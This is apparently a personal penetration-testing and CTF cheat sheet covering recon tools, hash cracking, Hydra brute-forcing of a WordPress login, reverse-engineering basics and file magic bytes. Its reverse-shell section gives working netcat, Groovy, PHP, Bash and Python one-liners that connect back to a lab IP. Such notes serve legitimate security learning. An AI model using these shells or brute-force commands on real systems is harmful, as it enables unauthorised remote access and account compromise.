# CheatSheet

- write scripts for automating repetitive tasks like:
  - look for the domain of the company
  - look for subdomains of the domain
  - look for DNS entries
  - use Google Hacking for deeper recon
  - generate a detailed report of all findings
  - ...
- create a docker-based environment for pentesting/bug bounty hunting (find a way to run GUI-based tools in Docker)
- For pentesting/bug bounty hunting there is a very detailed map and guide on how to proceed.
- Very useful BugBounty CheatSheet from EdOverflow
- Bug Bounty Writeups for learning
serve the current directory over HTTP (quick file transfer)

```bash
python -m SimpleHTTPServer
python3 -m http.server
php -S 0.0.0.0:8000
ruby -run -e httpd . -p 8000
```
scans networks

```bash
nmap -sC -sV -oA nmap/openadmin 10.10.10.171
```

- `-sC` = scans with the default scripts
- `-sV` = scans the service versions
bruteforce websites to find directories and/or files

```bash
gobuster dir -u http://10.10.10.10/ -w /path/to/wordlist
```
scans a target for WordPress related stuff

```bash
## basic scan
wpscan --url 10.10.10.10
## advanced scan with user/plugin enumeration and aggressive plugin detection
wpscan --url 10.10.10.10 --enumerate p,u --plugins-detection aggressive
```
creates a wordlist from a website

```bash
cewl -d 2 -m 5 -w genwords.txt https://10.10.10.10
```
enumerates Windows and Samba systems

Ports to look for: 445, 139

```bash
enum4linux -U -o 10.10.10.10
```
finding specific filetypes in a domain

```bash
goofile -d kali.org -f pdf
```
searches the local Exploit-DB copy for a keyword

```bash
searchsploit tomcat
```
John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations against a service daemon like an FTP or telnet server. John, however, needs the hash first, so the greater challenge for an attacker is to obtain the hash that is to be cracked. Nowadays hashes are more easily crackable using free rainbow tables available online: submit the hash to one of the sites and, if the hash is made from a common word, the site shows the word almost instantly. Rainbow tables basically store common words and their hashes in a large database; the larger the database, the more words are covered.
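Why such lookups only work against unsalted hashes, as an added example (not from the original cheat sheet): a tiny constructed "table" of common words stands in for a rainbow table, and a random per-user salt makes the same word miss every precomputed entry.

```python
import hashlib
import secrets

# Constructed stand-in for a rainbow table: a few common words. A real table
# holds billions of precomputed word -> hash pairs, but the principle is the same.
COMMON_WORDS = ["password", "123456", "letmein", "qwerty", "dragon"]


def build_lookup_table(words, algo="md5"):
    """Precompute hex digest -> word for unsalted hashes of common words."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in words}


def lookup(table, hex_digest):
    """Reverse a hash instantly if it was precomputed, otherwise None."""
    return table.get(hex_digest.lower())


def salted_hash(word, salt, algo="sha256"):
    """Hash salt || word: the same word yields a different digest per salt."""
    return hashlib.new(algo, salt + word.encode()).hexdigest()


def demo():
    """The unsalted hash of a common word is found; the salted one is not."""
    md5_table = build_lookup_table(COMMON_WORDS, "md5")
    leaked = hashlib.md5(b"letmein").hexdigest()  # constructed "leaked" hash
    found = lookup(md5_table, leaked)              # -> "letmein"

    # Same word, but stored with a random per-user salt: no table built before
    # the salt was known can contain this digest.
    salt = secrets.token_bytes(16)
    sha_table = build_lookup_table(COMMON_WORDS, "sha256")
    not_found = lookup(sha_table, salted_hash("letmein", salt))  # -> None
    return found, not_found


if __name__ == "__main__":
    print(demo())
```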
Command | Description |
---|---|
`john --wordlist=/usr/share/wordlists/rockyou.txt hash` | JTR password cracking with a wordlist |
`john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt` | JTR forced descrypt cracking with wordlist |
`john --format=descrypt hash --show` | JTR forced descrypt brute-force cracking; `--show` displays the cracked passwords |
hydra: online password guessing against an HTTP POST login form (`-L` username list, `-p` a single password, the string after the last colon marks a failed login)

```bash
hydra -L wordlist -p test 10.10.147.44 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid Username" -t 30
```
Tool to read and modify the metadata of files.

```bash
exiftool <file>
exiftool -artist=me <file>
```
radare2 is a tool for reverse-engineering

```bash
# start radare2
radare2 file
# analyze all
aa
# list all functions
afl
# set selection (seek) to the main function
s main
# disassemble the current function
pdf
# show graph
VV
```
wfuzz is a web fuzzing tool (here used to fuzz virtual hosts via the Host header)

```bash
wfuzz -H "Host: FUZZ.<domain>" -c -z file,"<path/to/wordlist>" <domain>
```
inspecting binaries

```bash
# print printable strings
strings binaryFile
# hex + ASCII dump
hexdump --canonical binaryFile
# disassemble all sections (Intel 64-bit mnemonics)
objdump -D -M x86-64 binaryFile
```
```text
================  rax (64 bits)
        ========  eax (32 bits)
            ====  ax  (16 bits)
            ==    ah  (8 bits, upper half of ax)
              ==  al  (8 bits, lower half of ax)
```
Register | Purpose | Saved across calls |
---|---|---|
RAX | temp register; return value | no |
RBX | callee-saved | yes |
RCX | used to pass 4th argument to functions | no |
RDX | used to pass 3rd argument to functions | no |
RSP | stack pointer | yes |
RBP | callee-saved; base pointer | yes |
RSI | used to pass 2nd argument to functions | no |
RDI | used to pass 1st argument to functions | no |
R8 | used to pass 5th argument to functions | no |
R9 | used to pass 6th argument to functions | no |
R10-11 | temporary | no |
R12-15 | callee-saved registers | yes |
```nasm
MOV DESTINATION, SOURCE   ; Intel syntax: destination first, then source
```

Stack pointer (SP/RSP):
- points to the next item on the stack
- grows downwards

Base pointer (BP/RBP):
- unchanged point in memory where the stack (frame) starts

```text
memory:                  CPU:
0x0000  ________
       |        | <-------------- | SP |
       |        |        |------- | BP |
       |        |        |        | IP |
       |        | <------|        | .. |
       |        |                 | .. |
       |        |                 | .. |
0xFFFF |________|
```
```bash
# listener
nc -lnvp 4000
# connect back from the target
nc -e /bin/sh 10.10.15.22 4000
```
Groovy:

```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.15.22/4000;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
PHP:

```bash
php -r '$sock=fsockopen("10.10.15.22",4000);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
```

Bash:

```bash
bash -i >& /dev/tcp/10.10.15.22/4000 0>&1
```

Python:

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
upgrade the shell to a full TTY

- can be executed with python or python3

```bash
python(3) -c 'import pty; pty.spawn("/bin/bash")'
# then press Ctrl-Z to background the shell and, in the local terminal:
stty raw -echo
fg
# or on one line:
stty raw -echo; fg
```
```bash
#!/bin/bash
# hex-encode the first argument (16 bytes per output line)
echo "$1" | tr -d "\n" | hexdump -v -e '16/1 "%02x " "\n"'
```

```bash
#!/bin/bash
# hex-decode the first argument back to raw bytes
echo "$1" | xxd -r -p
```
Interesting Stack Exchange link
A proxy is an intermediary between both communication partners. If you send a request to a server, the proxy intercepts it and forwards it to the server as if it had sent the request itself, so the server does not learn about the original client; the response travels back the same way.

A proxy chain is multiple proxy servers chained together, so it is much more difficult to find out who the initial sender (client) was.
Here is a nice graphic on who sees what in Tor and HTTPS cases.
Use
- these magic numbers at the start of a file define the type of file

Type | Magic bytes |
---|---|
BMP | `42 4D` |
JPG | `FF D8 FF E0` |
PNG | `89 50 4E 47` |
GIF | `47 49 46 38` |
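Checking a file's type by its magic bytes rather than its name, as an added example (not from the original cheat sheet): it uses the table above, adds the Exif JPEG prefix `FF D8 FF E1` (only JFIF files start with `FF D8 FF E0`), and flags uploads whose extension disagrees with their content; the `.jpeg` alias and the sample files are constructed assumptions.

```python
# Magic numbers from the cheat sheet above, plus (added here) the Exif JPEG
# variant FF D8 FF E1, since only JFIF files start with FF D8 FF E0.
MAGIC = {
    "bmp": [bytes.fromhex("42 4D")],
    "jpg": [bytes.fromhex("FF D8 FF E0"), bytes.fromhex("FF D8 FF E1")],
    "png": [bytes.fromhex("89 50 4E 47")],
    "gif": [bytes.fromhex("47 49 46 38")],
}
# Assumption: .jpeg is treated as the same type as .jpg.
EXT_ALIASES = {"jpeg": "jpg"}


def detect_type(data: bytes):
    """Return the type whose magic prefix matches the start of data, else None."""
    for kind, prefixes in MAGIC.items():
        if any(data.startswith(p) for p in prefixes):
            return kind
    return None


def check_upload(filename: str, data: bytes) -> dict:
    """Compare the extension a client claims with what the bytes say.

    ok is True only when the content is a known type AND matches the extension;
    a mismatch (a "PNG" that is really a GIF, or not an image at all) is what an
    upload handler should reject instead of trusting the file name.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXT_ALIASES.get(ext, ext)
    detected = detect_type(data)
    return {"claimed": claimed, "detected": detected,
            "ok": detected is not None and detected == claimed}


# Constructed sample uploads (only the first bytes matter for this check).
SAMPLES = {
    "photo.jpeg": bytes.fromhex("FF D8 FF E1") + b"\x00\x16Exif\x00\x00",
    "logo.png": bytes.fromhex("89 50 4E 47 0D 0A 1A 0A") + b"\x00" * 8,
    "avatar.png": b"GIF89a" + b"\x00" * 10,        # GIF disguised as PNG
    "report.bmp": b"MZ\x90\x00" + b"\x00" * 12,    # not an image at all
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, check_upload(name, data))
```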
- find programs which can be executed with sudo without a password

```bash
sudo -l
```

- find files that belong to root but can be read by anyone because of group permissions